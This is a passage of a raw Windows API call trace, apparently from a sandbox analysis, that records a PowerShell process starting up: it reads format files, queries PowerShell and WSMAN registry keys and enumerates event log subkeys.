lpOverlapped=0x0) returned 1 [0078.867] ReadFile (in: hFile=0x310, lpBuffer=0x3c485f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c485f8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.868] ReadFile (in: hFile=0x310, lpBuffer=0x3c485f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c485f8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.868] ReadFile (in: hFile=0x310, lpBuffer=0x3c485f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c485f8*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.868] ReadFile (in: hFile=0x310, lpBuffer=0x3c485f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c485f8*, lpNumberOfBytesRead=0xcccf8*=0x8b4, lpOverlapped=0x0) returned 1 [0078.868] ReadFile (in: hFile=0x310, lpBuffer=0x3c47a14, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c47a14*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.868] ReadFile (in: hFile=0x310, lpBuffer=0x3c485f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c485f8*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.868] SetErrorMode (uMode=0x1) returned 0x1 [0078.869] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0078.869] SetErrorMode (uMode=0x1) returned 0x1 [0078.869] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.869] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.869] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0310 [0078.869] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f0310, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.869] CoTaskMemFree (pv=0x1b8f0310) [0078.869] RegCloseKey (hKey=0x310) returned 0x0 [0078.870] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0x15a9607a, Data2=0x38eb, Data3=0x4fd7, Data4=([0]=0xbc, [1]=0xd5, [2]=0x31, [3]=0xea, [4]=0xae, [5]=0x3c, [6]=0x5a, [7]=0xd2))) returned 0x0 [0078.870] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xe9014572, Data2=0x7213, Data3=0x48f7, Data4=([0]=0xa2, [1]=0xf7, [2]=0x3a, [3]=0xac, [4]=0xa, [5]=0xde, [6]=0x3b, [7]=0x64))) returned 0x0 [0078.870] SetErrorMode (uMode=0x1) returned 0x1 [0078.870] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x310 [0078.870] SetErrorMode (uMode=0x1) returned 0x1 [0078.871] GetFileType (hFile=0x310) returned 0x1 [0078.871] ReadFile (in: hFile=0x310, lpBuffer=0x3c863e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c863e0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.872] ReadFile (in: hFile=0x310, lpBuffer=0x3c863e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c863e0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.872] ReadFile (in: hFile=0x310, lpBuffer=0x3c863e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c863e0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.872] ReadFile (in: hFile=0x310, lpBuffer=0x3c863e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c863e0*, lpNumberOfBytesRead=0xcccf8*=0x1000, lpOverlapped=0x0) returned 1 [0078.873] ReadFile (in: hFile=0x310, lpBuffer=0x3c863e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c863e0*, lpNumberOfBytesRead=0xcccf8*=0xe98, lpOverlapped=0x0) returned 1 [0078.873] ReadFile (in: hFile=0x310, lpBuffer=0x3c859e0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c859e0*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.873] ReadFile (in: hFile=0x310, lpBuffer=0x3c863e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcccf8, lpOverlapped=0x0 | out: lpBuffer=0x3c863e0*, lpNumberOfBytesRead=0xcccf8*=0x0, lpOverlapped=0x0) returned 1 [0078.873] SetErrorMode (uMode=0x1) returned 0x1 [0078.873] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccca0 | out: lpFileInformation=0xccca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0078.873] SetErrorMode (uMode=0x1) returned 0x1 [0078.873] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xccd88 | out: phkResult=0xccd88*=0x310) returned 0x0 [0078.873] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd0c, lpData=0x0, lpcbData=0xccd08*=0x0 | out: lpType=0xccd0c*=0x1, lpData=0x0, lpcbData=0xccd08*=0x56) returned 0x0 [0078.873] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f0310 [0078.873] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcccdc, lpData=0x1b8f0310, lpcbData=0xcccd8*=0x56 | out: lpType=0xcccdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcccd8*=0x56) returned 0x0 [0078.873] CoTaskMemFree (pv=0x1b8f0310) [0078.873] RegCloseKey (hKey=0x310) returned 0x0 [0078.874] VirtualQuery (in: lpAddress=0xcb820, lpBuffer=0xcc6e0, dwLength=0x30 | out: lpBuffer=0xcc6e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0078.875] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xd21156b, Data2=0xe7e8, Data3=0x4427, Data4=([0]=0x8f, [1]=0xe4, [2]=0xee, [3]=0x9a, [4]=0x87, [5]=0x33, [6]=0x6a, [7]=0x42))) returned 0x0 [0078.875] CoCreateGuid (in: pguid=0xccfb0 | out: pguid=0xccfb0*(Data1=0xea0cb4e7, Data2=0xec7, Data3=0x40aa, Data4=([0]=0xa2, [1]=0xd4, [2]=0x2f, [3]=0x8e, [4]=0x75, [5]=0x2d, [6]=0x1a, [7]=0x79))) returned 0x0 [0078.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0078.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0078.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0078.906] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0078.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0078.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0078.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0078.954] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0078.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0078.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0078.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c [0078.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0078.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0079.061] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.061] CoTaskMemFree (pv=0x1ef6c0) [0079.063] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.063] CoTaskMemFree (pv=0x1ef6c0) [0079.064] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.065] CoTaskMemFree (pv=0x1ef6c0) [0079.066] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.066] CoTaskMemFree (pv=0x1ef6c0) [0079.077] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.077] CoTaskMemFree (pv=0x1ef6c0) [0079.078] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.079] CoTaskMemFree (pv=0x1ef6c0) [0079.079] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.079] CoTaskMemFree (pv=0x1ef6c0) [0079.083] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf98 | out: phkResult=0xccf98*=0x310) returned 0x0 [0079.086] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcce9c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce98, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcce9c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce98*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.086] CoTaskMemFree (pv=0x0) [0079.086] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.086] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x1a3a10, lpcchValueName=0xccf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xccf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0079.086] CoTaskMemFree (pv=0x1a3a10) [0079.086] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.086] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x1a3a10, lpcchValueName=0xccf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xccf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0079.086] CoTaskMemFree (pv=0x1a3a10) [0079.087] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.087] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x1a3a10, lpcchValueName=0xccf48, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xccf48, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0079.087] CoTaskMemFree (pv=0x1a3a10) [0079.087] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccf2c, lpData=0x0, lpcbData=0xccf28*=0x0 | out: lpType=0xccf2c*=0x1, lpData=0x0, lpcbData=0xccf28*=0x8) returned 0x0 [0079.087] CoTaskMemAlloc (cb=0xc) returned 0x1b8e98f0 [0079.087] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccefc, lpData=0x1b8e98f0, lpcbData=0xccef8*=0x8 | out: lpType=0xccefc*=0x1, lpData="2.0", lpcbData=0xccef8*=0x8) returned 0x0 [0079.087] CoTaskMemFree (pv=0x1b8e98f0) [0079.178] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xccee8 | out: phkResult=0xccee8*=0x324) returned 0x0 [0079.179] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccdec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccde8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccdec*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccde8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.179] CoTaskMemFree (pv=0x0) [0079.179] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.179] RegEnumValueW (in: hKey=0x324, dwIndex=0x0, lpValueName=0x1a3a10, lpcchValueName=0xcce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0079.179] CoTaskMemFree (pv=0x1a3a10) [0079.179] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.179] RegEnumValueW (in: hKey=0x324, dwIndex=0x1, lpValueName=0x1a3a10, lpcchValueName=0xcce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0079.179] CoTaskMemFree (pv=0x1a3a10) [0079.179] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.179] RegEnumValueW (in: hKey=0x324, dwIndex=0x2, lpValueName=0x1a3a10, lpcchValueName=0xcce98, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcce98, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0079.179] CoTaskMemFree (pv=0x1a3a10) [0079.179] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcce7c, lpData=0x0, lpcbData=0xcce78*=0x0 | out: lpType=0xcce7c*=0x1, lpData=0x0, lpcbData=0xcce78*=0x8) returned 0x0 [0079.179] CoTaskMemAlloc (cb=0xc) returned 0x1b8e9750 [0079.179] RegQueryValueExW (in: hKey=0x324, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcce4c, lpData=0x1b8e9750, lpcbData=0xcce48*=0x8 | out: lpType=0xcce4c*=0x1, lpData="2.0", lpcbData=0xcce48*=0x8) returned 0x0 [0079.179] CoTaskMemFree (pv=0x1b8e9750) [0079.181] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.181] CoTaskMemFree (pv=0x1ef6c0) [0079.187] CoTaskMemAlloc (cb=0x104) returned 0x1ef6c0 [0079.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef6c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.188] CoTaskMemFree (pv=0x1ef6c0) [0079.195] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf18 | out: phkResult=0xccf18*=0x334) returned 0x0 [0079.199] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcce8c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce88, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcce8c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcce88*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.199] CoTaskMemFree (pv=0x0) [0079.200] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.200] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x0, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.200] CoTaskMemFree (pv=0x1a3a10) [0079.200] CoTaskMemFree (pv=0x0) [0079.200] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.200] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x1, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.200] CoTaskMemFree (pv=0x1a3a10) [0079.200] CoTaskMemFree (pv=0x0) [0079.200] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.200] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x2, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.200] CoTaskMemFree (pv=0x1a3a10) [0079.200] CoTaskMemFree (pv=0x0) [0079.201] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.201] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x3, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.201] CoTaskMemFree (pv=0x1a3a10) [0079.201] CoTaskMemFree (pv=0x0) [0079.201] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.201] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x4, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.201] CoTaskMemFree (pv=0x1a3a10) [0079.201] CoTaskMemFree (pv=0x0) [0079.201] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.201] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x5, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccf18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0079.201] CoTaskMemFree (pv=0x1a3a10) [0079.201] CoTaskMemFree (pv=0x0) [0079.201] CoTaskMemAlloc (cb=0x204) returned 0x1a3a10 [0079.201] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x6, lpName=0x1a3a10, lpcchName=0xccf18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, 